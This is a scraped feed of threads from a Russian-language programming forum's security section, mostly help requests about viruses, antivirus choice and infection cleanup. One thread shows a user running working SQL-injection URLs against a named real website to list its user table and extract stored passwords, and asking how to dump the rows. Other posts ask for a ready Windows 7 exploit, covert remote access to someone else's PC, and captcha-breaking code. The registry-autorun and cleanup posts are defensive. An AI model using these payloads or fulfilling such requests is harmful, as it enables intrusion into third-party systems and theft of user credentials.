delfcode

Windows 8.1 UAC

xXxSh@dowxXx — Sat, 07 Mar 2015 14:45:00 GMT

Google раскрыла подробности о критической бреши в Windows 8.1

Уязвимость позволяет скомпрометировать целевую систему путем обхода функционала UAC.
Эксперты компании Google из Project Zero опубликовали подробности критической уязвимости в операционной системе Windows 8.1 от Microsoft, передает Naked Security. В настоящий момент брешь все еще не устранена.

Подробности уязвимости были обнародованы автоматически поскольку с того момента, как исследователи уведомили разработчиков о наличии бреши прошло 90 дней. Соответствующее предупреждение было отправлено Microsoft еще 30 сентября прошлого года.

Как следует из уведомления Google, брешь находится в механизме контроля учетных записей пользователей (UAC), а точнее в функции NtApphelpCacheControl. Эксплуатация уязвимости позволяет вредоносным приложениям обойти ограничения UAC. Таким образом, программы злоумышленников могут работать на инфицированной системе с административными привилегиями.

Стоит отметить, что в качестве мер предосторожности пользователи могут использовать административную учетную запись, что исключает необходимость использования системой как UAC в целом, так и его уязвимых компонентов.

PS: взято отсюда - http://zhacker.net/it-news/2582-uyazvimost-v-windows-81.html

Peгиcтpaция дoмeнa

sergei-pit_bull — Mon, 04 Aug 2014 16:42:26 GMT

Форум: Безопасность
Описание темы: нyжнa кoнcyльтaция
Автор темы: sergei-pit_bull
Автор последнего сообщения: Anton93
Количество ответов: 7

Sql инъекция

Neo — Mon, 01 Jul 2013 18:18:47 GMT

Вот случайно нашёл сайт с уязвимостью sql inj.Вот прочитал тазвание таблицы с юзерами,а вот строки таблице почему-то не выводятся.Может кто знает как их прочитать.

Code

http://www.uniscan.by/articles.php?id=9999+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=0x616d635f7573657273--

Вот так должны прочитаться user_password из amc_users.

Code

http://www.uniscan.by/articles.php?id=9999+union+select+1,user_password,3,4,5++from+amc_users

Но почему-то вылазит ошибка Error in getting 1 article!

ASPack unpack

ms301 — Thu, 11 Apr 2013 13:48:40 GMT

Форум: Безопасность
Описание темы: Распаковать программу
Автор темы: ms301
Автор последнего сообщения: ms301
Количество ответов: 3

Посоветуйте антивирус

Slash — Fri, 22 Mar 2013 17:41:03 GMT

Форум: Безопасность
Описание темы: Посоветуйте AV!
Автор темы: Slash
Автор последнего сообщения: XSPY
Количество ответов: 6

Nod32 или G-Data?

Slash — Fri, 25 Jan 2013 19:16:25 GMT

Форум: Безопасность
Описание темы: Что лучше!
Автор темы: Slash
Автор последнего сообщения: virusik85
Количество ответов: 4

Win7 New Exploit

xXxSh@dowxXx — Fri, 16 Nov 2012 00:07:32 GMT

Всем доброго времени суток!

Наткнулся сегодня на статью Обнаружена уязвимость в Windows 7, очень заинтересовало, хоть и сама уязвимость была опубликована автором 21.10.2012г., но все же она вроде как еще работает и её вполне можно использовать...
сразу же возник вопрос, кто может написать сам експлоит, так как к сожалению я его не нашел, хотя быть может плохо искал , сильно не пинайте, вот собственно видео от автора...

если у кого то уже есть такое чудо, поделитесь пожалуйста ссылочкой или исходником?
зарание большое спасибо

Нужна помощь!

Del — Wed, 29 Aug 2012 09:56:02 GMT

Здравствуйте! У меня появилась такая проблема: Почти на каждом сайте выскакивает такое окошко: http://s52.radikal.ru/i136/1208/c4/ed8f08cf8a66.jpg . А при входе в Вконтакте говорит, что на мой профиль пытались войти 10 раз и, что надо ввести свой номер телефона(чтобы обойти такую хрень надо поставить язык страницы на украинский). У меня было подобная чушь раньше, а потом сама пропала. Подскажите, пожалуйста, как удалить эту фигню?

Проверить подозрительный файл

dolphin — Sat, 14 Jul 2012 08:38:28 GMT

Здесь осуществляется онлайн проверка файла 32 антивирусами
A-Squared, AntiVir, Arcavir, Avast, AVG, BitDefender, CA (VET), ClamAV, Comodo, Dr.Web, Ewido, F-Prot, F-Secure, Fortinet, ViRobot, Ikarus, JiangMin, Kaspersky, KingSoft, McAfee, mks_vir, NOD32, Norman, Panda, Trend Micro, Quick Heal, Rising, Sophos, Symantec, nProtect, The Hacker, VBA32, VirusBuster, Prevx

Распознавание капчи

Freeze — Thu, 14 Jun 2012 18:53:45 GMT

Прив! Нужна помощь! Есть у кого-нибудь исходник для распознавания капчи (похожей на Вконтакте)? Или отзовитесь, кто сталкивался с этим делом и умеет писать подобные проги. ICQ: 66655510. Спасибо большое! =)

Узнаём IP

dolphin — Sat, 05 May 2012 03:41:04 GMT

Как узнать IP отправителя письма по e-mail

На mail.ru
Откройте письмо
Нажмите RFC
И вы увидите так называемый код письма в котором будет IP машины отправителя, а также точное время доставки письма на smtp-сервер, программу-клиент с которой было отправлено сообщение и.т.д

На rambler.ru
Откройте письмо
В переключателе "Другие действия" выберете Код письма
И вы увидите так называемый код письма в котором будет IP машины отправителя, а также точное время доставки письма на smtp-сервер, программу-клиент с которой было отправлено сообщение и.т.д.

На yandex.ru
Откройте письмо
Нажмите самую правую кнопку "Свойства письма"
И вы увидите так называемый код письма в котором будет IP машины отправителя, а также точное время доставки письма на smtp-сервер, программу-клиент с которой было отправлено сообщение и.т.д

Если вы используете Microsoft Outlook
В контекстном меню письма выберете "Свойства", а далее вкладку "Подробнее"
И вы увидите так называемый код письма в котором будет IP машины отправителя, а также точное время доставки письма на smtp-сервер, программу-клиент с которой было отправлено сообщение и.т.д

Если вы используете The Bat
Откройте письмо
Нажмите F9
И вы увидите так называемый код письма в котором будет IP машины отправителя, а также точное время доставки письма на smtp-сервер, программу-клиент с которой было отправлено сообщение и.т.д

Неведомая вирусня

link993 — Sun, 22 Apr 2012 22:23:16 GMT

Господа, в очередной раз обращаюсь к вам за помощью. Сегодня какой-то гад поселился у меня в компе. Сайты антивирусной тематики не работают. Касперский, стоящий на моем компе, не рычит. В hosts изменений нет, но рядом появился файл imhosts с таким содержанием:

Code

# Copyright (c) 1993-1999 Microsoft Corp.
#
#
# ќв® ®Ўа §Ґж д ©«  LMHOSTS, ЁбЇ®«м§гойҐЈ®бп Microsoft TCP/IP ¤«п
# Windows.
#
# ќв®в д ©« б®¤Ґа¦Ёв в Ў«Ёжг б®®вўҐвбвўЁп IP- ¤аҐб®ў Ё ®Ўлзле (NetBIOS)
# Ё¬Ґ Є®¬ЇмовҐа®ў. Љ ¦¤л© н«Ґ¬Ґв ¤®«¦Ґ а бЇ®«  вмбп ў ®в¤Ґ«м®©
# бва®ЄҐ. IP- ¤аҐб ¤®«¦Ґ зЁ вмбп б ЇҐаў®© Ї®§ЁжЁЁ бва®ЄЁ,   §  Ё¬
# б«Ґ¤гҐв б®®вўҐвбвўгойҐҐ Ё¬п Є®¬ЇмовҐа . IP- ¤аҐб Ё Ё¬п Є®¬ЇмовҐа  ¤®«¦л
# Ўлвм ®в¤Ґ«Ґл ¤агЈ ®в ¤агЈ  е®вп Ўл ®¤Ё¬ Їа®ЎҐ«®¬ Ё«Ё бЁ¬ў®«®¬ в Ўг«пжЁЁ.
# ‡ Є "#" ЁбЇ®«м§гҐвбп ®Ўлз® ¤«п гЄ § Ёп    з «® Є®¬¬Ґв аЁп
# (€бЄ«озҐЁп Ё§ нв®Ј® Їа ўЁ«  Ўг¤гв ЇҐаҐзЁб«Ґл Ё¦Ґ).
#
# ќв®в д ©« б®ў¬ҐбвЁЁ¬ б д ©« ¬Ё Microsoft LAN Manager 2.x TCP/IP lmhosts,
# Ё ў Ґ¬ ¬®¦® ЁбЇ®«м§®ў вм б«Ґ¤гойЁҐ ¤®Ї®«ЁвҐ«млҐ ®ЇҐа в®ал:
#
#      #PRE
#      #DOM:<¤®¬Ґ>
#      #INCLUDE <Ё¬п_д ©« >
#      #BEGIN_ALTERNATE
#      #END_ALTERNATE
#      \0xnn (Ї®¤¤Ґа¦Є  бЇҐжЁ «мле бЁ¬ў®«®ў)
#
# …б«Ё ¤®Ї®«Ёвм «оЎго Ё§ бва®Є бЁ¬ў®« ¬Ё "#PRE", в® б®®вўҐвбвўгойЁ©
# н«Ґ¬Ґв Ўг¤Ґв ЇаҐ¤ў аЁвҐ«м® § Јаг¦Ґ ў ЎгдҐа Ё¬Ґ. Џ® г¬®«з Ёо
# н«Ґ¬Ґвл нв®Ј® бЇЁбЄ  Ґ § Јаг¦ овбп ЇаҐ¤ў аЁвҐ«м®,   ўҐбм бЇЁб®Є
# Їа®б¬ ваЁў Ґвбп в®«мЄ® ў в®¬ б«гз Ґ, Ґб«Ё ¤Ё ¬ЁзҐбЄ®Ґ а §аҐиҐЁҐ
# б®®вўҐвбвўЁ© Ё¬Ґ Ґ ЇаЁўҐ«® Є гбЇҐег.
#
# …б«Ё ¤®Ї®«Ёвм «оЎго Ё§ бва®Є бЁ¬ў®« ¬Ё "#DOM:<¤®¬Ґ>", в®
# б®®вўҐвбвўгойЁ© н«Ґ¬Ґв Ўг¤Ґв бўп§ б гЄ § л¬ ¤®¬Ґ®¬.
# ќв® ў«ЁпҐв   Ї®ўҐ¤ҐЁҐ б«г¦Ў ®Ў§®а  Ё аҐЈЁбва жЁЁ ў баҐ¤Ґ TCP/IP.
# „«п в®Ј®, зв®Ўл ®ЎҐбЇҐзЁвм ЇаҐ¤ў аЁвҐ«мго § Јаг§Єг Ё¬ҐЁ, бўп§ ®Ј®
# б® бва®Є®© #DOM, Ґ®Ўе®¤Ё¬® в Є¦Ґ ¤®Ў ўЁвм #PRE Є нв®© бва®ЄҐ.
# €¬п в Є®Ј® ¤®¬Ґ  Ўг¤Ґв ЇаҐ¤ў аЁвҐ«м® § Јаг¦Ґ®, е®вп Ё Ґ Ўг¤Ґв
# ®в®Ўа ¦ вмбп ЇаЁ Їа®б¬®ваҐ ЎгдҐа  Ё¬Ґ.
#
# …б«Ё ¤®Ї®«Ёвм «оЎго Ё§ бва®Є бЁ¬ў®« ¬Ё "#INCLUDE <Ё¬п_д ©« >", в®
# нв® ЇаЁўҐ¤Ґв Є в®¬г, зв® RFC NetBIOS (NBT) Їа®Ё§ўҐ¤Ґв Ї®ЁбЄ гЄ § ®Ј®
# д ©«  Ё ўлЇ®«Ёв ҐЈ® Їа®б¬®ва в Є, б«®ў® ® пў«пҐвбп «®Є «мл¬ д ©«®¬.
# ЋЎлз® <Ё¬п_д ©« > § ¤ Ґвбп ў д®а¬ вҐ UNC, зв® Ї®§ў®«пҐв еа Ёвм
# жҐва «Ё§®ў л© д ©« LMHOSTS   бҐаўҐаҐ. “звЁвҐ, зв® ў в Є®¬ б«гз Ґ
# бва®Є  б®®вўҐвбвўЁп IP- ¤аҐб  ¤«п ЁбЇ®«м§гҐ¬®Ј® бҐаўҐа  ЋЃџ‡Ђ’…‹њЌЋ
# ¤®«¦  ЇаҐ¤иҐбвў®ў вм ҐЈ® ЁбЇ®«м§®ў Ёо ў ¤ЁаҐЄвЁўҐ #INCLUDE.
# ќв® б®®вўҐвбвўЁҐ в Є¦Ґ ¤®«¦® ЁбЇ®«§®ў вм ¤ЁаҐЄвЁўг #PRE.
# Ља®¬Ґ в®Ј®, ®ЎйЁ© аҐбгаб "public" Ё§ ЇаЁўҐ¤Ґ®Ј® Ё¦Ґ ЇаЁ¬Ґа  ¤®«¦Ґ
# ЇаЁбгвбвў®ў вм ў бЇЁбЄҐ "NullSessionShares"   LanManServer ¤«п в®Ј®,
# зв®Ўл Є«ЁҐвл б¬®Ј«Ё гбЇҐи® Їа®зЁв вм д ©« LMHOSTS.
# ќв®в Ї а ¬Ґва еа Ёвбп ў бЁбвҐ¬®¬ аҐҐбваҐ Ї®  ¤аҐбг
# \machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares.
# Ќг¦® Їа®бв® ¤®Ў ўЁвм бва®Єг "public" Є Ё¬ҐойҐ¬гбп в ¬ бЇЁбЄг.
#
# Љ«озҐўлҐ б«®ў  #BEGIN_ Ё #END_ALTERNATE Ї®§ў®«пов ЈагЇЇЁа®ў вм ў¬ҐбвҐ
# ҐбЄ®«мЄ® ¤ЁаҐЄвЁў #INCLUDE. •®вп Ўл ®¤® гбЇҐи®Ґ ўлЇ®«ҐЁҐ ¤ЁаҐЄвЁўл
# "include" бзЁв Ґвбп гбЇҐил¬ ўлЇ®«ҐЁҐ¬ ўбҐ© ЈагЇЇл.
#
# Ќ Є®Ґж, ¬®¦® ЁбЇ®«м§®ў вм бЇҐжЁ «млҐ бЁ¬ў®«л ЇаЁ б®Ї®бв ў«ҐЁЁ Ё¬Ґ
# б Ї®¬®ймо § Є«озҐЁп б®®вўҐвбвўгойҐЈ® Ё¬ҐЁ ў Є ўлзЄЁ,   § вҐ¬
# ЁбЇ®«м§®ў Ёп иҐбв ¤ж вҐаЁз®Ј® Є®¤  бЁ¬ў®«  б Ї®¬®ймо § ЇЁбЁ \0xnn.
#
# ‚ б«Ґ¤гойҐ¬ ЇаЁ¬ҐаҐ ЁбЇ®«м§говбп ўбҐ ЇҐаҐзЁб«ҐлҐ ўлиҐ ¤®Ї®«ЁвҐ«млҐ
# ®ЇҐа в®ал:
#
# 102.54.94.97   rhino     #PRE #DOM:networking  #¤®¬Ґ ЈагЇЇл
# 102.54.94.102  "appname  \0x14"                #бЇҐжЁ «мл© бҐаўҐа ЇаЁ«®¦ҐЁ©
# 102.54.94.123  popular        #PRE             #ЇаҐ¤ў аЁвҐ«м® § Јаг¦ Ґ¬®Ґ Ё¬п
# 102.54.94.117  localsrv       #PRE             #бҐаўҐа, ЁбЇ®«м§гҐ¬л© ў "INCLUDE"
#
# #BEGIN_ALTERNATE
# #INCLUDE \\localsrv\public\lmhosts
# #INCLUDE \\rhino\public\lmhosts
# #END_ALTERNATE
#
# ‚ ЇаЁўҐ¤Ґ®¬ ўлиҐ ЇаЁ¬ҐаҐ ў Ё¬ҐЁ бҐаўҐа  "appname" б®¤Ґа¦Ёвбп бЇҐжЁ «мл©
# бЁ¬ў®«, Ё¬Ґ  бҐаўҐа®ў "popular" Ё "localsrv" Ўг¤гв ЇаҐ¤ў аЁвҐ«м® § Јаг¦Ґл,
# Ё¬п бҐаўҐа  "rhino" Ўг¤Ґв ЁбЇ®«м§®ў вмбп ¤«п Ї®«гзҐЁп жҐва «Ё§®ў ®Ј®
# д ©«  LMHOSTS ў в®¬ б«гз Ґ, Ґб«Ё бЁбвҐ¬  "localsrv" Ўг¤Ґв Ґ¤®бвгЇ .
#
# “звЁвҐ, зв® ўҐбм д ©« LMHOSTS, ўЄ«оз п Є®¬¬Ґв аЁЁ, Ўг¤Ґв Їа®б¬ ваЁў вмбп
# ЇаЁ Є ¦¤®¬ ҐЈ® ЁбЇ®«м§®ў ЁЁ, в Є зв® Ё¬ҐҐв б¬лб« ¬ЁЁ¬Ё§Ёа®ў вм Є®«ЁзҐбвў®
# ЁбЇ®«м§гҐ¬ле Є®¬¬Ґв аЁҐў. Џ® нв®© ЇаЁзЁҐ Ґ б«Ґ¤гҐв Їа®бв® ¤®Ї®«пвм
# ¤ л© д ©« г¦л¬Ё бва®Є ¬Ё в Ў«Ёжл б®®вўҐвбвўЁп,   «гзиҐ Ўг¤Ґв
# б®§¤ вм ®ўл© д ©«.

Я думаю, что вирусня что-то с этим файлом мудрит. Сайты антивирусов открываются только через разные анонимайзеры (ито не всегда). Что делать господа? Могу приложить вам этот файл в помощь. P.s. антивирусы не обновляются:-(

Gravitas: Хватит посещать порносайты :D

QR code и его возможности

xXxSh@dowxXx — Sun, 08 Apr 2012 19:00:21 GMT

QR-код (англ. quick response — быстрый отклик) — матричный код (двухмерный штрихкод), разработанный и представленный японской компанией «Denso-Wave» в 1994 году.

Основное достоинство QR-кода — легкое распознавание сканирующим оборудованием (в том числе и фотокамерой мобильного телефона), что дает возможность использования в торговле, производстве, логистике. QR-коды больше всего распространены в Японии, стране, где штрих-коды пользовались такой большой популярностью, что объём информации, зашифрованной в коде, вскоре перестал устраивать индустрию. Японцы начали экспериментировать с новыми способами кодирования небольших объёмов информации в графической картинке. Уже в начале 2000 года QR-коды получили широкое распространение в Японии, их можно было встретить на большом количестве плакатов, упаковок и товаров.

Максимальное количество символов, которые помещаются в один QR-код:

цифры — 7089;
цифры и буквы (включая кириллицу) — 4296;
двоичный код — 2953 байт;
иероглифы — 1817.

Материал из Википедии - http://ru.wikipedia.org/wiki/QR-%D0%BA%D0%BE%D0%B4

Только вдумайтесь как давно это было, аж в 1994 году! , а по настоящему и в полной мере о его возможностях заговорили и стали использовать только сейчас, с недавних пор QR code получил большое распространение и его начали вешать на всевозможные места (адресные вывески на зданиях в которых шифруется информация о доме и тп, музеи, рекламные щиты, плакаты, постеры, татуировки, изображения на футболке в виде QR code, в японии вобще некоторые используют их на могилах умерших что бы каждый мог узнать кучу информации об умершем, которая бы просто так не уместилась бы на гранитной плите, и еще многое другое...), где его только щас не используют, но что больше всего меня удивляет на данный момент, никто даже не задумался о его безопасности, ведь в нем можно зашифровать абсолютно любую информацию...

Так вот, как вы считаете активное развитие и распространение QR code может стать глобальной массовой уязвимостью?

я тут че та запарелся на счет изучения QR code , посмотрел видяхи, нашел сайт http://qrcoder.ru/ с которого можно вроде как даже смс отправлять, вобще судя по видяхе, в QR code можно зашифровать абсолютно любую фигню начиная от текста и заканчивая ссылками на видео потоки, трансляции, просто видео файлы, изображения, уязвимые ссылки, не говоря уже об експлоитах и тд.
впринципе это пока мало изучено но уже используется во многих сферах
мне кажется это открывает кучу новых возможностей для хакинга!!!

у кого какое мнение, было бы интересно узнать, может кто ближе знаком с этой удивительной на первый взгляд фиговинкой, давайте обсудим???

Собственная защита

Qubert — Wed, 29 Feb 2012 09:17:42 GMT

Здравствуйте!
У меня возник такой вопрос: "Как можно обезопасить себя, сделав так, чтобы твое местонахождение было довольно сложно определить?"

к примеру, если у человека и так есть динамический айпи, все равно ведь есть возможность определения местанахождения!
что можно еще делать, так, чтобы сайты не могли определить верно в какой ты местности(городе, регионе и т.д.), чтобы нельзя было найти тебя)

очень интересно!
спасибо за будущие ответы!

Угрозы

dolphin — Wed, 29 Feb 2012 09:04:33 GMT

Вот один неадекватный товарищ пообещал нас взломать
Доступно только для пользователей
Что будем делать?

Можно ли заработать в интернете?

Lizer — Tue, 21 Feb 2012 09:52:51 GMT

Здравствуйте! Я нередко нахожу на сайтах сообщения типа: заработок в интернете, работа в интернете. Скажите пожалуйста реально ли это? Попробывал почтовиков, но мне кажется это фигня. Есть какие нибудь другие варианты? p.s. Модераторы, перенесите пожалуйста в другой раздел если я немного не там создал тему Спасибо!

Антивирусный сканер Jotti

dolphin — Wed, 08 Feb 2012 13:00:03 GMT

http://virusscan.jotti.org

Что скажете насчёт этого сканера? Отсылает базы как вт?

Ненужные описания вредоносов

link993 — Sun, 05 Feb 2012 20:05:42 GMT

Читал я на днях описания на securelist.com и наткнулся на такое описание

http://www.securelist.com/ru/descriptions/17122072/Trojan.Win32.Agent.gwvg

Появился вопрос. Нахера создавать такие описания? Такую программу написать можно меньше чем за 2 минуты. Разработчики вирусни и сотрудники секьюрелиста страдают херней, туда-бы троянчек с delfcode...

P.s если не в том разделе прошу переместить)

WORD

Marra_Kesh — Sun, 22 Jan 2012 17:24:34 GMT

Привет всем местным! ЗначитЪся так! Открываю документ.docx( с помощЪю WORD'a соответственно) и очи свои направляю на нижний левый угол, где написано: Страница 1 из N, и число N с max скоростью увеличивается до 100, 200, 300 и тд, ЧТО ЖЕ ЭТО???
Неужели Марсиянэ захвали WORD???

Win32.Neshta

cool1 — Thu, 12 Jan 2012 15:06:27 GMT

Вобщем я попался на вирус нешта.
Потом почитал о нем и написал такой AVZ скрипт:

Code

begin
DeleteFile('C:\Documents and Settings\Alexandr\Local Settings\temp\tmp5023.tmp');
DeleteFile('C:\WINDOWS\svchost.com');
RegKeyDel('[ HKLM\Software\Classes\exefile\shell\open\command ]','"(default)" = " %Windir%\svchost.com %1 %*"');
end.

Вобщем вроде вируса нет) НО есть одна проблема!!! Как востановить файлы после заражения? Авира ругается)))

Удалённый доступ к ПК без контакта с пользователем

phl — Wed, 04 Jan 2012 00:59:38 GMT

Извиняюсь не совсем по дельфи тема, но всё же хотелось узнать есть ли реальные способы доступа к удалённому ПК без радмин,вирусов,хотя бы натолкните на мысль, от чего отталкиваться,т.е.никакого контакта с пользователем, без необходимости подсовывать ему наш файл, чтобы он его запустил.
Т.е. есть ПК, подключенный к интернету, мы знаем IP, нам необходимо туда попасть.

MBR шифрование

Just_Crow — Wed, 24 Aug 2011 04:33:00 GMT

Вообщем тулза не хорошая (MBRLocker) зашифровала все мои данные, все бы ничего, но слетела винда и теперь код обратного дискрипта не работает/// возможно ли чем вернуть данные?

Самостоятельная защита от вирусов

dolphin — Sat, 30 Apr 2011 10:00:38 GMT

многие вири и трои любят записываться в:
[HKLM\Software\Microsoft\Windows\CurrentVersion] в разделах: \Run, \RunOnce, \RunServices, \RunServicesOnce,
[HKLM\Software\Microsoft\WindowsNT\CurrentVersion\W inlogon\Userinit], а также в
[HKCU\Software\Microsoft\Windows\CurrentVersion] в разделах \Run, \RunOnce, \RunServices, \RunServicesOnce
Также троян может запустится, если в ветке HKCR его привязать к определенному типу файлов на открытие или редактирование.
Например, если выбрать любой bat-файл, кликнуть его правой кнопкой и выбрать "Изменить", по умолчанию запускается notepad.exe.
Это задается в [HKCR\batfile\shell\edit\command]. Также к этому могут быть причастны ключи реестра RestrictRun, DisallowRun.

Обзор методов автозапуска самых популярных вирей на данное время, точнее тех, которых знает антивирус.
Можно было описать еще десяток вирусов, но эти три демонстрируют основные методы записи.
1.
К примеру, Trojan-Downloader.Win32. AutoIt.fn (22 декабря, 2008) , пишется для автоматического запуска в:
[HKLM\Software\Microsoft\Windows\CurrentVersion\pol icies\Explorer\Run]
"csrcs" = "%System%\csrcs.exe"
///Например, можно спутать с csrss.exe, часть пользовательской Win32 подсистемы. SRSS - сокращение
///от "client/server run-time subsystem" (клиент/серверная подсистема).
///csrss отвечает за консольные приложения, создание/удаление потоков и за 16-битную виртуальную среду MS-DOS.
и
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "Explorer.exe csrcs.exe" , просто и со вкусом, запускается каждый раз при старте эксплорера (не_интернет).

2.
Червь Net-Worm.Win32. Gimmiv.a (22 декабря, 2008) , запускает себя немного по-другому.
Для автоматического запуска при следующем старте системы червь добавляет ссылку на свой исполняемый файл в ключ
автозапуска системного реестра:
[HKLM\SYSTEM\CurrentControlSet\Services\sysmgr]
При следующей загрузке Windows исполняемый файл червя будет запущен как служба, а его оригинальный исполняемый файл удален.

3.
Трой Trojan-Notifier.Win32. VB.m (22 декабря, 2008) , написанный на VBasic, исспользует уже знакомую процедуру:
для автоматического запуска при каждом следующем старте системы троянец добавляет ссылку на свой исполняемый файл
в ключ автозапуска системного реестра:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"popuppers" = "<путь к оригинальному файлу трояна>"
После запуска троянец пытается удалить ключи системного реестра:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
loads.exe
mediamotor.exe
Всё шито крыто, не подкопаешься.. =)

А вот так мы прячемся, путем изменения параметров.
[HKCU\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Advanced]
"Hidden" = "2"
"SuperHidden" = "0"
"ShowSuperHidden" = "0"
и
[HKLM\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue" = "1"
Таким образом, троянец отключает отображение скрытых файлов и попок.

Исходя из деструктивных действий рассмотренных вирусов, а также семейства подобных, стоит запретить для пользователя
изменения параметров в следующих ветка:
[HKLM\Software\Microsoft\Windows\CurrentVersion]
[HKLM\Software\Microsoft\WindowsNT\CurrentVersion\W inlogon\Userinit]
Также на всю ветвь HKCR также можно отменить право на запись (только под одмином).

Изменение прав доступа к реестру производится с помощью regedt32 во вкладке permissions (Правка -> Разрешения).

Итог.
Производя проверку реестра описанным методом, необходимо пройтись по всем вышеуказанным веткам реестра,
в поисках аномалий. Причем необходимо это делать в один заход, от начала и до конца по всем веткам,
иначе после перезагрузки машина останется зараженной.
Всю описанную выше процедуру я проверял на практике, вначале когда приспичило (подхватил вирус), а потом когда стало интересно.
К написанию этой мини-статьи подтолкнуло обзор вирусоф и своевременное прочтение интересной книги

ЗЫ статейка ни на что не претендует, так.. в помощь людям подцепившим вирусню, которым религия не позволяет юзать онтевирус